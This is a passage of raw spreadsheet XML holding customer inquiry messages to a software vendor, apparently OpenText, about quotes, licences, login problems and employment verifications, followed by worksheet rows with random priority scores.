In fact we are looking for an OCR server side that meets our software(SICTD SERVER) needs._x000D_
_x000D_
Some words about sictd server :_x000D_
_x000D_
The SICTD (System of Capture and Treatment of Documents by Image) is a GED project, from which it carries out the process of capture, transmission, treatment and export of customer files ._x000D_
_x000D_
Our requirements :_x000D_
_x000D_
    Optical character recognition (OCR) server._x000D_
    Unlimited volume(about 350000 per day)._x000D_
    Offline process._x000D_
    Template matching for form._x000D_
    Ubuntu/Windows._x000D_
    Full support_x000D_
    Preference : JAVA API._x000D_
_x000D_
_x000D_
We have checked the captcha site to get the price of the Server-based OCR solution and we are a little bit confused ._x000D_
_x000D_
For this reason we need a deep explanation about if this product match our needs and about the price side,_x000D_
_x000D_
We will be so glad to receive a response as soon as possible and we are available for any suggestions ._x000D_
_x000D_
Best,</t>
  </si>
  <si>
    <t xml:space="preserve">.Hi, my name is Antonia Ward from Carriers and Consumers Group. I am asking for an employment verification for the name listed above._x000D_
Please provide the following details:_x000D_
Position held: _x000D_
Dates of employment: _x000D_
Reason for Leaving:_x000D_
Eligibility for Rehire:_x000D_
Salary information if available. _x000D_
_x000D_
Thank you for your assistance in advance!_x000D_
_x000D_
Kind Regards, _x000D_
Antonia Ward_x000D_
Phone 631-862-9300 ext 167_x000D_
Carriers and Consumers Group _x000D_
1030 Lillington Highway _x000D_
Spring Lake, NC 28390_x000D_
ref # 10121970-9_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I am reading the CEO White Paper series from 2012/2013 and am unable to locate the article called It's All Connected. Are you able to send me the link or a PDF version of the article?</t>
  </si>
  <si>
    <t>I am reading your CEO White Paper series from 2012/2013 and cannot locate the article called Its All Connected. Are you able to send me a PDF version of it?</t>
  </si>
  <si>
    <t>Can't change password.  I have tried4 time and it will not let me change it.</t>
  </si>
  <si>
    <t>I need the HR contact number so we can have someone complete an employment verification form for a prior employee of OpenText, or the contact info for the department that handles employment verifications.</t>
  </si>
  <si>
    <t>We are currently running RightFax 10.5 and need Windows 10 compatibility.  I am looking for information regarding a more current version that will work on Windows 10 Enterprise x64.</t>
  </si>
  <si>
    <t>You have the wrong address for us. I'm an EMC Documentum Client. Please Change our Address in your records._x000D_
_x000D_
From:_x000D_
1007 N Orange St., Suite 1130, Wilmington, DE 19801_x000D_
_x000D_
To:_x000D_
PO Box 9301, Wilmington, DE 19809_x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">I need to change the MAC address associated with the REdact-It Desktop program we purchased from Infograph. All of the information for changing this i have is pointed to infograph._x000D_
_x000D_
    Software ID: a036000000g0FDj _x000D_
        Software PIN: 400485 _x000D_
   Related license information: _x000D_
   Account: Guglielmo And Associates _x000D_
   Usage: (not specified) _x000D_
   Seat(s): 1_x000D_
</t>
  </si>
  <si>
    <t>Mutual clients are requesting that we work with you to make their document management use our PDF-XChange Editor rather than Adobe Reader._x000D_
_x000D_
Are you interested in working with us to provide a way for our mutual clients to have your product launch our Adobe Reader alternative?_x000D_
_x000D_
Sincerely_x000D_
_x000D_
Paul O'Rorke_x000D_
Corporate Support_x000D_
Tracker Software Products.</t>
  </si>
  <si>
    <t>We are an IT consulting firm and we are looking for a Fax solution for one of our customers in Hospice industry.</t>
  </si>
  <si>
    <t>About a month ago you gave us a program to allow us to print PDFs using FTP from Spyview. The program works great. We setup FTP printing on all our printers and discovered only a handful can print the PDFs. We are looking into purchasing new printers to replace the ones that don't print. Before we buy them I was wondering if you could tell me when Spyview will have the ability to print PDFs using the normal print option? Someone told me last year it would be sometime in 2017. Thanks</t>
  </si>
  <si>
    <t>My customer needs RightFax server so I need a quote.</t>
  </si>
  <si>
    <t>I am inquiring for one of our business partners. DO you offer non-profits a discount on the Redact-It desktop version?</t>
  </si>
  <si>
    <t>looking for training support</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I want to know how much is the licence for using documentum platform for development. and also if it is possible to use it on a trial. </t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I'm contacting you in request for information in regards to Spicer Imagenation v8.00's compatibility with Windows 10. We're planning on deploying Windows 10 at Meritor and we have identified that your software may be in use at the site, if you could let me know if it is compatible or not then it would be greatly appreciated._x000D_
</t>
  </si>
  <si>
    <t>We are an IT company based out of India. We would like to become OT's partner as we see a development and support scope for one of our existing vendor._x000D_
Do let me know how to proceed ahead</t>
  </si>
  <si>
    <t>Is it possible to get the domain name : magellan.com ?</t>
  </si>
  <si>
    <t>I would like to receive the SAP connector</t>
  </si>
  <si>
    <t>Need details for powerdocs product</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
Exane need to automate a process (currently manual) of broker confirmation input. _x000D_
We daily receive different formats (PDF, Excel,  Word, Email, web site) coming from different other brokers (about 100) managing his own format. _x000D_
The objective is to be able to extract automatically some informations (security code, price, quantity, direction, amount, brokerage fee, broker name,etc...) in save them into a database._x000D_
The tool OpenTextCapure Center seems to have this kind of feature._x000D_
Could you come back to me and tell me if your tool matches with the described requirement ?_x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Emmanuel_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> I trust this email finds you well. Currently working for a client in the Public Sector we are entering the second phase of a Data Warehouse implementation project. During the first phase of the project, I have gathered a list of functional requirements and now I am undertaking a product option analysis for our client, evaluating the different players of the market (mapping requirements to product functionalities)._x000D_
When would you be free end of week for a call ? I will be able to share with you the name of our client and specs._x000D_
Many thanks in advance for your quick turnaround as we are under a lot of time pressure with a vendor short list to bed one by end of next week._x000D_
Rgds,_x000D_
_x000D_
Dave_x000D_
</t>
  </si>
  <si>
    <t>--------------------【　英語が堪能な営業事務経験者　】　のご案内。_x000D_
_x000D_
_x000D_
度々のご連絡にて、大変失礼いたします。_x000D_
株式会社キャリアシステムと申します。_x000D_
_x000D_
弊社は、『パート派遣』×『即戦力』というキーワードで、_x000D_
優秀な派遣スタッフの提案させていただいております。_x000D_
企業様が抱える、即戦力採用や派遣に対しての課題解決のため、_x000D_
求められるポジションや経験に見合った主婦をご紹介しております。_x000D_
◆弊社HP　『派遣deパート』_x000D_
https://www.parthaken.jp/_x000D_
_x000D_
この度は、_x000D_
【英語が堪能な営業事務人材】をご紹介できればと思い、プロフィールを参考までにご案内させていただきます。_x000D_
_x000D_
╋━━━━━━━━━━━━━━━━━━━━━━━━_x000D_
◆アピールポイント◆_x000D_
英語が堪能な営業事務経験者_x000D_
_x000D_
◆略歴◆_x000D_
イギリスに8年在住中、現地で翻訳業務を子育ての合間に_x000D_
仕事としていました。ネイティブな英語が話せます。_x000D_
帰国後、営業事務と総務経理業務で就業経験があります。_x000D_
主な業務内容は以下の通りです。_x000D_
・営業のスケジュール管理_x000D_
・電話対応、来客応対_x000D_
・見積書・請求書作成_x000D_
・売掛金・買掛金管理_x000D_
・受発注・出荷対応_x000D_
・納品スケジュール管理_x000D_
・商品在庫確認_x000D_
・顧客情報の登録・管理_x000D_
_x000D_
◆就業形態◆_x000D_
週3～4　10:00～16:00の就業_x000D_
_x000D_
◆月額費用◆_x000D_
138,000円（月12日、1日5時間勤務として試算）_x000D_
＊交通費は別途請求させて頂きます。_x000D_
＊派遣料金2,300円/時間で試算。_x000D_
╋━━━━━━━━━━━━━━━━━━━━━━━━_x000D_
_x000D_
＊ご興味をお持ちいただけましたら、お早めにご連絡くださいませ。_x000D_
先着順にマッチングをさせていただきますので、_x000D_
タイミングによってはご紹介を致しかねる場合もございます。_x000D_
予めご了承ください。_x000D_
_x000D_
今回ご紹介させていただく人材以外にも、_x000D_
「Webデザイナー」「開発エンジニア」「経理」「営業事務」など、_x000D_
スキルを持った主婦の方に毎月200名近く登録いただいております。_x000D_
お困りの職種についてお気軽にご相談ください。_x000D_
_x000D_
実際にパートタイム派遣をご活用頂いている企業様をご紹介しております。_x000D_
是非、こちらもご覧下さい！_x000D_
https://www.parthaken.jp/employer/_x000D_
_x000D_
━━━━━━━━━━━━━━━━━━━━━━━━_x000D_
株式会社キャリアシステム 東京_x000D_
担当：浅井・佐藤_x000D_
cs-tokyo@919.jp_x000D_
フリーコール：0120-505-169_x000D_
_x000D_
〒107-0052　東京都港区赤坂2-11-7　ATT新館_x000D_
TEL：03-5574-7333_x000D_
「派遣deパート」：https://www.parthaken.jp/_x000D_
━━━━━━━━━━━━━━━━━━━━━━━━_x000D_
_x000D_
＊お手数ですが、配信停止をご希望される方は_x000D_
・社名_x000D_
・メールアドレス_x000D_
を記載いただき【配信停止】と記載いただき_x000D_
下記アドレスまでご返信いただけますでしょうか_x000D_
_x000D_
cs-tokyo@919.jp_x000D_
_x000D_
以後、配信しないよういたします。</t>
  </si>
  <si>
    <t xml:space="preserve">Good day. _x000D_
_x000D_
I would like to explore possible options on outsourcing the development of an internal content management system which should be able to integrate with an existing database. _x000D_
_x000D_
Please let me know how we can proceed further. Looking forward to hearing from you! </t>
  </si>
  <si>
    <t>SAP Opentext integration on SAP forms</t>
  </si>
  <si>
    <t xml:space="preserve">Sub : Forms 6/6i to Forms 12c Migration PoC_x000D_
Do you have resources who can do Forms 6/6i to Forms 12c Migration PoC onsite at customer place in Bangalore, India ?_x000D_
_x000D_
Appreciate reply ..._x000D_
</t>
  </si>
  <si>
    <t>I need to download iHub F-Type free for development</t>
  </si>
  <si>
    <t xml:space="preserve">I am currently trying to login to GXS, however, the password was changed and I am unable to login. I have reset the password but the new password that was emailed to me does not work. Could you please assist me in changing my password so that I can access GXS?_x000D_
_x000D_
Thank you. </t>
  </si>
  <si>
    <t>we're infor customer using the m3 product. we need a license key for the streamserve.</t>
  </si>
  <si>
    <t>seeking quote for OpenText Records Management only._x000D_
_x000D_
thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I would like to submit our RFI._x000D_
_x000D_
Please let me know who is the right contact._x000D_
_x000D_
Thanks in advance_x000D_
</t>
  </si>
  <si>
    <t>We received a notice that there is a Lookup Security Issue in OpenText DM 16.1 (tracking number DM-39998) and were told to contact you for a hotfix. As we are the IT support for LJSP, I was hoping you could provide us with instructions on how to get this resolved for them. Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">Hey Team, I have a customer interested in some of your product. please assist with a quote. </t>
  </si>
  <si>
    <t>I have interest on software that provide document controls (rev and approval) with electronic signatures, archives training modules, Qaudits, monitoring our clients (manufacturing activities), and archival reg affaird doc, _x000D_
_x000D_
we don't have it , we expect to the package include the installation and validation activity as well.</t>
  </si>
  <si>
    <t xml:space="preserve">this is a live test </t>
  </si>
  <si>
    <t>need support.  I am a contractor with IBM tasked to get OpenText ready for Windows 7 64bit.  My customer has an older program (I think eXCEED) that they had configurations that they like to transfer to OpenText version 15.0.1.  We have the .hep files.  Can we simply copy these files to a certain location so that they can be read/seen?  Initial try shows they are not seen._x000D_
Unfortunately I am on a very tight schedule and have to wrap this up by Tuesday March 7.  Expediting would be greatly appreciated</t>
  </si>
  <si>
    <t>Users with Windows 10 machines are getting error when using Live Editor</t>
  </si>
  <si>
    <t>Discuss large US Public Sector Opportunity with a Federal Agency.</t>
  </si>
  <si>
    <t>We are creating solutions proposition for Tier 1 Insurer in the area of Claims Automation.  We are evaluating multiple BPM Solutions for the packaging the solution.  Please contact me ASAP to discuss about the opportunity.</t>
  </si>
  <si>
    <t>Regarding Technical Analyst .</t>
  </si>
  <si>
    <t xml:space="preserve">Can you please quote us on these three renewals for Cardiff Teleform?_x000D_
_x000D_
Teleform Workgroup w/ 2 Add'l Readers Serial # 700796 _x000D_
Teleform Desktop Serial # 702937 _x000D_
Teleform Desktop Serial # 811584 _x000D_
</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I am trying to login to my account EY75000B, but every time I try to login, it will not allow me to do so. Can I get more insight to why this is occurring?  I've rest the password twice and still nothing is happening. I have two accounts I am trying to set up in this system, and cannot do anything until I have login access. _x000D_
_x000D_
Thanks, _x000D_
Jess_x000D_
_x000D_
_x000D_
Thanks, _x000D_
Jess</t>
  </si>
  <si>
    <t>I am thrilled that your text format has worked for someone, since you have cost me my job, my relationshiop, my kids, my home, my pension for 6 years of which out of $240,000 the IRE got $25,000, I got $23,000 and the lawyer got the rest. Plus s $25,000 check taken out of my pension with out my knowledge for an internet license. The lawyer then proceeded to not file a W4 for the next 3 Years, took 1/3 of my pension check, which I don't believe is legal under the act of ADA, nor because I never signed a contract and even if I had, it would be null and void since I did not have my own power of attorney at the time, so consequently I owe the IRS another $10,000 on the money he collected. _x000D_
_x000D_
So you will have to pardon me if I am not to thrilled about being excluded for the last 30 years while this whole scheme left me bankrupt, homeless and alone and with several physical not to mention mental illnesses. _x000D_
_x000D_
I wasn't a bitter person until this started to effect every aspect of my life, and because of this I cant keep others out of my finances or credit reports and my life has become more than challenging.  _x000D_
_x000D_
Good luck to you , and whatever you are going to do because i al filing human trafficking charges against all of You. Have a nice day</t>
  </si>
  <si>
    <t>I would like the name and contact # for the AT&amp;T Open Text Account Rep. It used to be Derrick Ambrosino I think, but I believe it is someone else now. Thanks.</t>
  </si>
  <si>
    <t>We need information about VIM system because we implement the ERP SAP and we need an invoice system and we want a know VIM can you send me information about VIM please!!</t>
  </si>
  <si>
    <t>Please provide federal government resellers to buy OpenText Brava to support about 500+ concurrent users._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Hello, I am a student at Conestoga College. I am currently in my second year and am searching for an unpaid internship for school. My teacher Rachelle Cooper had shown me a posting a while ago for an internship with your company but it has since been taken down. I was wondering if there are any internships with your Waterloo office still open and if I could possibly apply. If there is anyone more suited to answer these questions please let me know or give me their contact information. Thank you for your time, I look forward to hearing from you soon.</t>
  </si>
  <si>
    <t xml:space="preserve">One of our clients is using since 2013 the Opentext SOCKS client 14.0.7.0 in one of its business units profiles and we're now moving their profile to the 64-bit Windows architecture; Once we tried to push the 32-bit version over the new profile we see a message clearly specifying that the version 14 is not compatible with the 64-bit architecture;_x000D_
Could You please let me know which are the steps that we must follow to receive the upgrade to 64-bit._x000D_
Thanks for your help in advance._x000D_
</t>
  </si>
  <si>
    <t>My name is Brandi Richardson with CARCO Group, Inc. We are a professional fact finding organization, which represents a number of major corporations. One of our clients has requested to verify employment for Yuhui Zhao your company. Please respond with as much information as possible and reference case number 10122714-08. _x000D_
_x000D_
Brandi Richardson _x000D_
Cisive_x000D_
Phone: 631-862-9300, ext. 641/Fax: 918-591-2854_x000D_
brichardson@cisive.com</t>
  </si>
  <si>
    <t>I handle documentum and D2 implementations and applications at Covance, me and my team would require access to the support site to download service packs etc.,</t>
  </si>
  <si>
    <t>Hello, _x000D_
Requesting a demo on Kazeon and Documentum</t>
  </si>
  <si>
    <t>dears _x000D_
_x000D_
i have an exisiting Documentum solution,  with an expired license_x000D_
i would like some assistance to re-activate the system and aquire a new license _x000D_
_x000D_
i've already contacted Dubai's office twice , with no feedback so far _x000D_
_x000D_
thanks for your assistance _x000D_
regards_x000D_
Hussein jaber</t>
  </si>
  <si>
    <t xml:space="preserve">Dear OpenText,_x000D_
_x000D_
This e-mail is to inform you that Actelion is looking into initiating a Request for Information (RfI) process investigating possible document management systems for replacing the current EDMS._x000D_
_x000D_
We are going to include you in the RfI._x000D_
_x000D_
We expect you to receive the RfI around March 17, 2017. _x000D_
Please hold back any questions until then._x000D_
_x000D_
The contacts for this project is:_x000D_
Geoffray Schmitt (geoffray.schmitt@actelion.com)_x000D_
Christian Olesen (christian.olesen@ext.actelion.com)_x000D_
_x000D_
We are looking forward to working together with you.  _x000D_
Kind regards,_x000D_
Christian Olesen_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking at a product that could search information in our many databases (Lotus Notes, DB2, Content Manager, Doc Vision, Filenet Panagon, Livelink, Ultima, Sharepoint, CRM Siebel, Coba and directories on Servers)_x000D_
_x000D_
The data to exploit Lotus Notes are very important for us ..._x000D_
_x000D_
Do you have a product that performs research on both the central platform or distributed platforms? In addition, how are the results of the multi-database searches presented?_x000D_
</t>
  </si>
  <si>
    <t>Would like to speak with account manager regarding Digital Asset Management in OpenText.</t>
  </si>
  <si>
    <t>I'm working with my client, 20th Century Fox Digital Vault, and need to get information on what API/integration options are available for Artesia, so that we may connect up to our workflow automation software. To complete the development I would also require a temporary development installation and license of Artesia._x000D_
_x000D_
Please get back to me as soon as possible._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>I would like for my local rep to contact me.  Interested in a demo and presentation</t>
  </si>
  <si>
    <t>We are interested in your fax solution and would like to schedule a demo.</t>
  </si>
  <si>
    <t>Looking for some information about Enterprise Connect.  Is this the newest version of Livelink?  Does Enterprise Connect work with Office 365 and a Lotus Notes environment?</t>
  </si>
  <si>
    <t xml:space="preserve">I have an Air Force customer looking for a quote.  I reached to Ingram Micro for pricing &amp; they stated that the items were not supported at their desk.  Please reach out to me via email, and i'll forward you the request.  </t>
  </si>
  <si>
    <t>We are in the process of issuing a formal solicitation for an Enterprise Content Management System and would like contact information for the person who can help us.</t>
  </si>
  <si>
    <t xml:space="preserve">As an IT forensics, working for a german law enforcement department (tax investigation) I'm using Encase Forensic as a registered costumer since 2008.
I logged in today to my account and was trying to get access to the Encase download section and received the message: Access denied.
I tried to reregister one of my Encase Dongle: Access denied.
I tried to check my account settings: Access denied.
I've met Manfred Hatzesberger 2 weeks ago during a workshop in Berlin and he told us that OpenText has some issues with longtime registered customers.
Would you please be so kind and fix this?!
Best regards
Stefan Heuer
</t>
  </si>
  <si>
    <t>Hi there! 
Braskem wants a solution for ECM. OpenText seems to be a good option, but as a Data Scientist, I know our company will need some intelligence to connect data between platform. I would like to understand better if OpenText has some solutions for specific problems. 
Can we have a meeting to talk about some of these challenges?
Bests</t>
  </si>
  <si>
    <t>We have a customer who currently who got "SAP Archiving/Document Access" from OpenText. They have asked if we could integrate with this product to pull invoice copies into our web based application. Since I am not familiar with your products I was wondering if there is any web based API or similar that we can make calls to and pull PDF documents etc from OpenText?
If yes, please provide me with additional information where I can find documentation about that and any online test resource that might be available. 
If not, what product would they need in that case to be able to accomplish that? I am not sure if they even would consider buying any other products but I am just doing some research in what is available at this point of time.
Kind Regards,
  Christer</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there,
I can login to support page but your website is keep showing the following message:
--
No Access
We're sorry, your account does not grant you access to this resource.
Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us.
--
I have activated my account three times so far but still having the same issue.
Could you please look into this?
Many thanks!
Jung
</t>
  </si>
  <si>
    <t>Re: Your EnCase v8 Processor Request for Dongle 665881702
Hi there,
I believe we will get a complimentary processor license for our EnCase dongle.
Could you please send me the complimentary processor license for the dongle ID: 665881702?
Many thanks!
Jung</t>
  </si>
  <si>
    <t>Hi OpenText.
My support account doesn't work fine. Sometimes I can access my support to raise tickets. But some time I lost the access. The website keeps requesting an confirmation email. Even if i confirmed in the email address, I still cannot access my support. Please do a quick research for my account liyan3@zpmc.net and feed back to this email address.
Thank you.</t>
  </si>
  <si>
    <t>I've attempted to contact your company twice now in the last week or so, but I haven't received any reply. 
Our University currently uses Hummingbird BI-Query to do it's ad hoc reporting from our Student Records system. We would like to upgrade the reporting software, and as your company bought out Hummingbird several years ago, we would like to see what your current version looks like. 
Can you please get back in touch with me, preferably through email, as to whether we could have a demo version of your product to test.</t>
  </si>
  <si>
    <t>Hello,
Unfortunately, I can not access the "my support" section even though I am logged in.
I am requested to confirm my registration. But even that brings no change, although I confirmed the registration by link in the e-mail.
I need access to download updates or licenses if necessary.
Please contact me only via email.
Many Thanks!
regards
Rafael Placzek</t>
  </si>
  <si>
    <t>Hi. My name is Lori and I work at USAA. I am leading an effort to migrate from Windows 7 to Windows 10. We are on a very tight deadline as we are needing to complete our regression testing this week. However, we seem to have an issue regarding xEditor. It only seems to be happening with Office 365 both in Windows 7 and Windows 10. We have not ever gotten this error in Office 2013 but reverting back to that is not an option. However, some users can log in and it works fine and others get an error. The error says: Failed to start editor. Exception from HRESULT: 0x800A17F5. For more information please see log file. Strangely, some installs have been fixed by reinstalling the PComm packages; there's no obvious connection and this isn't consistently successful either. Another suggestion is that  it might be that the Office change is pulling out a needed common software control and not taking into account any existing needs for that control from other apps.  The effect of reinstalling pcomm sounds like it reinstalls the control for its own needs and would probably follow for many other apps that have similar common component needs, if not present they install them to the system and those are not exclusive to those applications. If this is the case, we need OpenText to help identify their common component needs so the Office team can make sure they aren’t removing that control on a change of version. At this point it has been requested to engage OpenText. We have exhausted our resources to troubleshoot this any further. It was our understanding that xEditor was certified to be compatible with Office365 so if it isn’t we need to figure out why. Office365 is installed on 70,000 computers across the USAA enterprise and xEditor is the only one at this time that seems to have an issue. We cannot find any detailed logs to review exactly what is preventing xEditor to launch. 
This is only a theory of course, but it might be that the office change is pulling out a needed common s</t>
  </si>
  <si>
    <t>Hello,
We are looking for a new Document management System for our Company, Ardian.
Could tou please get back to us so we can arrange a meeting.
Best regards,
Sevil Karaman</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
We are currently moving our work Flow system to Open Text. I am reviewing our requirements to comply with the protection of Private Health Information(PHI). As a Life Insurance company , we are not considered a covered entity or business associate and I did find a statement at the HSS site  indicating a Life Insurance company  does not have to follow the US HIPPA rules  
However, we are required to follow New York Department of Financial Services regulations regarding the protection of private health information. I did look on your website but could not find specific information as to how access  control is managed so only authorized users have access. In addition I assume the data is encrypted at rest but I did not find specific details. Finally I was looking for information as it relates to audit trails covering who accessed the data, if data was updated and when. I assume your actual level of coverage forh this wold be beyond the New York state requirement  as your app would cover both HIPPA in the US and GDPR in Europe    
Any documentation you can provide regarding the protection of PHI would be greatly appreciated   
Sincerely 
Joe LaMar CISA, CISM,CISSP 
 </t>
  </si>
  <si>
    <t xml:space="preserve">Hello,
One of my staff member is looking to book the 2-0120 OpenText Records Management 16.2 course you have scheduled for Ottawa and I am told that you have a standard rate of 750$ CDN per day for Canadian Government employees. 
Can you please confirm that so that I can budget accordingly?
Thank you
Robert
</t>
  </si>
  <si>
    <t>How does one access the related forums and product updates for Encase products?  Before the merger, I received emails indicating a version release.  Now, not only don't I get an email, I can't find where to go to find downloads period!
Additionally, the forums and ENSCRIPT downloads were very helpful.  Again, after the merger I can't find either.
Looking at my Dongle expiration date, it says 1/30/28, when I actually purchase the product in March!!!
I'm seriously considering not renewing my SMS as in addition to all of these problems, Version 8 is a hot mess.  I'm also considering letting my EnCE lapse as I'm sure the process to renew it will be as cryptic and convoluted as trying to obtain basic SMS help that I paid for with the product.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,
I am contacting you on behalf of Hyman, Phelps &amp; McNamara P.C.
We are a Citrix-based environment currently utilizing your software Brava! Desktop 7.0.
We would like to upgrade to Brava Desktop 16.4. 
We will need 75 licenses. 
Can you please confirm the cost of this, and if support is included in this cost?
If not, can you please confirm the cost of support as well.
I can be reached at 312-656-4252.
Thank you,
Michael
</t>
  </si>
  <si>
    <t>I am reaching out from the Seattle office from Softchoice.  I have a customer interested in two of your products, The Open Text Report &amp; Output Management Suite (Vista Plus Suite) and the Open Text Trusted Link.  I am hoping to get in contact with someone regarding these two products and hopefully getting a quote for my customer.  If you could please send me an email that would be great.
Thank you,
Adam</t>
  </si>
  <si>
    <t>Priority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</si>
</sst>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0072"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="E1" workbookViewId="0">
      <selection activeCell="F2" sqref="F2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="15.42578125" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="27.140625" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="255.5703125" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1" t="s">
        <v>0</v>
      </c>
      <c r="B1" t="s">
        <v>1</v>
      </c>
      <c r="C1" t="s">
        <v>2</v>
      </c>
      <c r="D1" t="s">
        <v>3</v>
      </c>
      <c r="E1" t="s">
        <v>4</v>
      </c>
      <c r="F1" t="s">
        <v>27462</v>
      </c>
    </row>
    <row r="2" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2" s="1">
        <v>43559.641782407409</v>
      </c>
      <c r="B2" t="s">
        <v>5</v>
      </c>
      <c r="C2" t="s">
        <v>6</v>
      </c>
      <c r="D2" t="s">
        <v>7</v>
      </c>
      <c r="E2" s="2" t="s">
        <v>8</v>
      </c>
      <c r="F2">
        <f t="shared" ref="F2:F65" ca="1" si="0">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="3" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3" s="1">
        <v>43559.628935185188</v>
      </c>
      <c r="B3" t="s">
        <v>9</v>
      </c>
      <c r="C3" t="s">
        <v>10</v>
      </c>
      <c r="D3" t="s">
        <v>11</v>
      </c>
      <c r="E3" t="s">
        <v>12</v>
      </c>
      <c r="F3">
        <f t="shared" ca="1" si="0"/>
        <v>3</v>
      </c>
    </row>
    <row r="4" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4" s="1">
        <v>43559.619247685187</v>
      </c>
      <c r="B4" t="s">
        <v>13</v>
      </c>
      <c r="C4" t="s">
        <v>10</v>
      </c>
      <c r="D4" t="s">
        <v>14</v>
      </c>
      <c r="E4" s="2" t="s">
        <v>15</v>
      </c>
      <c r="F4">
        <f t="shared" ca="1" si="0"/>
        <v>5</v>
      </c>
    </row>
    <row r="5" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5" s="1">
        <v>43559.611273148148</v>
      </c>
      <c r="B5" t="s">
        <v>13</v>
      </c>
      <c r="C5" t="s">
        <v>16</v>
      </c>
      <c r="F5">
        <f t="shared" ca="1" si="0"/>
        <v>3</v>
      </c>
    </row>
    <row r="6" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6" s="1">
        <v>43559.598923611113</v>
      </c>
      <c r="B6" t="s">
        <v>5</v>
      </c>
      <c r="C6" t="s">
        <v>10</v>
      </c>
      <c r="D6" t="s">
        <v>17</v>
      </c>
      <c r="E6" t="s">
        <v>18</v>
      </c>
      <c r="F6">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
    </row>
    <row r="7" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7" s="1">
        <v>43559.591493055559</v>
      </c>
      <c r="B7" t="s">
        <v>19</v>
      </c>
      <c r="C7" t="s">
        <v>10</v>
      </c>
      <c r="D7" t="s">
        <v>20</v>
      </c>
      <c r="E7" t="s">
        <v>21</v>
      </c>
      <c r="F7">
        <f t="shared" ca="1" si="0"/>
        <v>2</v>
      </c>
    </row>
    <row r="8" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8" s="1">
        <v>43559.590162037035</v>
      </c>
      <c r="B8" t="s">
        <v>22</v>
      </c>
      <c r="C8" t="s">
        <v>10</v>
      </c>
      <c r="D8" t="s">
        <v>23</v>
      </c>
      <c r="E8" t="s">
        <v>24</v>
      </c>
      <c r="F8">
        <f t="shared" ca="1" si="0"/>
        <v>5</v>
      </c>
    </row>
    <row r="9" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9" s="1">
        <v>43559.581354166665</v>
      </c>
      <c r="B9" t="s">
        <v>19</v>
      </c>
      <c r="C9" t="s">
        <v>10</v>
      </c>
      <c r="D9" t="s">
        <v>23</v>
      </c>
      <c r="E9" t="s">
        <v>24</v>
      </c>
      <c r="F9">
        <f t="shared" ca="1" si="0"/>
        <v>2</v>
      </c>
    </row>
    <row r="10" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10" s="1">
        <v>43559.581157407411</v>
      </c>
      <c r="B10" t="s">
        <v>19</v>
      </c>
      <c r="C10" t="s">
        <v>10</v>
      </c>
      <c r="D10" t="s">
        <v>23</v>
      </c>
      <c r="E10" t="s">
        <v>24</v>
      </c>
      <c r="F10">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
    </row>
    <row r="11" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11" s="1">
        <v>43559.580023148148</v>
      </c>
      <c r="B11" t="s">
        <v>5</v>
      </c>
      <c r="C11" t="s">
        <v>6</v>
      </c>
      <c r="D11" t="s">
        <v>25</v>
      </c>
      <c r="E11" t="s">
        <v>26</v>
      </c>
      <c r="F11">
        <f t="shared" ca="1" si="0"/>
        <v>3</v>
      </c>
    </row>
    <row r="12" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12" s="1">
        <v>43559.579270833332</v>
      </c>
      <c r="B12" t="s">
        <v>5</v>
      </c>
      <c r="C12" t="s">
        <v>6</v>
      </c>
      <c r="D12" t="s">
        <v>25</v>
      </c>
      <c r="E12" t="s">
        <v>27</v>
      </c>
      <c r="F12">
        <f t="shared" ca="1" si="0"/>
        <v>2</v>
      </c>
    </row>
    <row r="13" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13" s="1">
        <v>43559.578888888886</v>
      </c>
      <c r="B13" t="s">
        <v>19</v>
      </c>
      <c r="C13" t="s">
        <v>10</v>
      </c>
      <c r="D13" t="s">
        <v>23</v>
      </c>
      <c r="E13" t="s">
        <v>28</v>
      </c>
      <c r="F13">
        <f t="shared" ca="1" si="0"/>
        <v>2</v>
      </c>
    </row>
    <row r="14" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14" s="1">
        <v>43559.578703703701</v>
      </c>
      <c r="B14" t="s">
        <v>19</v>
      </c>
      <c r="C14" t="s">
        <v>10</v>
      </c>
      <c r="D14" t="s">
        <v>23</v>
      </c>
      <c r="E14" t="s">
        <v>28</v>
      </c>
      <c r="F14">
        <f t="shared" ca="1" si="0"/>
        <v>3</v>
      </c>
    </row>
    <row r="15" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15" s="1">
